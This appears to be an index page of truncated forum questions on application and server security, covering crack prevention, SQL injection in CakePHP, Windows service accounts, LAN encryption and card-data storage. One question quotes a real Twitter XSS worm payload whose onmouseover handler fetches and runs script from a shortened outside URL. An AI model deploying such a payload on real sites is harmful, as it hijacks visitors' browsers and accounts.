Hi folks,
I'm developing on an application at the moment which contains quite a lot of personal user information - things like Facebook contacts, etc ... Now, one of the things I want to be able to do (and have done, quite effectively) is open up parts of the application to "3rd Party" applications, using Android's built-in inter-proces...
What are your experiences/thoughts?
Are there currently any approaches that prevent automated cracks? I know that any app is crackable if someone is persistent. However, I would like to make it as hard as possible for the crackers.
What methods are currently used for integrity checking and crack prevention?
...
I am thinking of using cakePHP to build a web app. My question is how much of the security stuff will I have to code myself (to prevent SQL injection etc.)? What security stuff does cakePHP take care of by itself and what will I have to code?
...
I want to limit access to username+password table to one query pattern like:
SELECT count(id) AS auth_result
FROM user
WHERE username = '%s'
AND password = SHA1('%s')
(this query doesn't pretend to be working from the point of injection vulnerability, just an example)
Is that possible? or am I missing some different approach?
...
Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/
Is this technically an XSS attack or something else?
Here is how the Twitter home page l...
I have just added the code to my index.html and uploaded the file. But Google Analytics Status says the code is not installed (not found).
I have a VPS (own server) which I manage myself.
Thing is, in my case, I have a setup like this:
IP address at a VPS provider
Domain name at an ISP
A-Pointer to point my domain to my IP address...
[1] states the well-known fact (see also, e.g., [2], etc.) that upon installation, i.e. in a workgroup, Windows has a LocalSystem (SYSTEM) account which:
"The LocalSystem account is a predefined local account that has extensive privileges on the local computer. This account is only available to system processes and does not have a pass...
Reposting my unanswered technet.microsoft question.
The MSDN "ASP.NET Delegation" article says:
1) "When you configure to use a particular account as the process identity, ASP.NET attempts to delegate that account. If it is a local account that is identical (including password) to a local account on a remote machine, delegation i...
[1] says:
"When you configure to use a particular account as the process identity, ASP.NET attempts to delegate that account. If it is a local account that is identical (including password) to a local account on a remote machine, delegation is possible. If such an account does not exist on the remote machine, to the network it appe...
Inside of large companies, is it standard practice to use SSL (e.g. https) for running corporate apps over the LAN? I am thinking of ERP systems, SFA systems, HR systems, etc. But I am also thinking of SOA...web service providers and consumers.
In other words, is there any concern that something on the LAN could be sniffing plaintext ...
I have a jQuery function that runs through the page, finds links to a certain domain, does an ajax call to get some data and crafts a tooltip when the visitor hovers their mouse over the link. Just like wowhead.com/tooltips.
What are some things to consider when allowing other sites to include your script files, linked directly from you...
Hello, We have a WMQ - WAS/JMS client setup through server connection channels where we are trying to put in security through user Ids.
Now, we set up a local user id on the MQ box, mquserid, and left the channel's MCAUSER blank.
We thought: the id running the MQ client (WAS in our case) wasuserid, when passed to MQ will fail as it is...
Hi
On 2nd edition of "Programming WCF Services" By Lowy, ch 10, page 512.
Lowy said about Transport security: Its main downside is that it can only guarantee transfer security point-point, meaning when the client connects directly to the service. Having multiple intermediaries between the client and the service renders Transport securi...
Is there a published set of IE enhanced security blocking rules?
Background: When I try out certain jQuery scripts, I sometimes trigger the IE enhanced security warning - then it's a matter of trial and error removing bits of the code until I find the offending part, and see if the jQuery can work without it. Commenting out the code doe...
I have been struggling with this problem for the last week. I have an obfuscated exe of my application. Our application is an offline tool for an online web application. The client will install this application and connect once to the internet; the application will download relevant information and store it in an XML file on the client machine for further display. for secu...
I am working in PHP on a Linux server with MySQL.
I have a requirement (that I have attempted to talk them out of) to collect credit card information from users so that our company can use the card numbers to hold hotel rooms for a conference. We will not be charging the cards ourselves at all, but instead just sending them to the ho...
Is it possible to understand whether a certificate in Windows cert store imported as "Enable Strong Private Key" protection in .NET?
...
I am still unable to figure out the following which are related to Oracle padding security issue. The no. 1 point is in general which I wanted to know the easy way to change the Machine key. The no. 2 point is related to Security issue.
If I change the machine key then how easily I can change the user passwords stored in the DB. User p...
I am looking for a way to restrict direct access to a certain folder or folders on our website which is hosted in IIS7 in our second dev environment, IIS6 in our first dev environment and IIS6 on production.
Basically we should be able to link to these files from our website i.e.:
http://www.domain.com/stuff/survey.pdf
But if someone t...
Hi all,
Environment:
11g db server
The "SQLNET.ENCRYPTION_SERVER" value is not being taken from the configuration file; it is taking the default value "ACCEPTED" instead of "REQUIRED". After the changes were done through Net Manager I restarted the listener. Please advise where I need to make the changes.
Trace file:
2010-09-22 19:11:13...